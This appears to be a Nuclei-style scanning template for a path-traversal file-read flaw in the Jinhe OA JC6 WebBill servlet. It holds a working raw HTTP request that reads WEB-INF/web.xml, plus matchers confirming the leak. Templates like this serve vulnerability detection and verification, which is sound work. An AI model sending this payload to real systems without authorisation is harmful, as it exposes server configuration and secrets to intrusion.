id: jinheOA-JC6-WebBill-File-reading

info:
  name: jinheOA-JC6-WebBill-File-reading
  author: xxx
  severity: high
  tags: File reading

http:
  - raw:
      - |
        GET /jc6/servlet/WebBill?key=GetFileContent&pathfile=/../WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?xml version='
          - '<web-app'
          - '</web-app'
          - '</context-param>'
        condition: and
      - type: status
        status: 
          - 200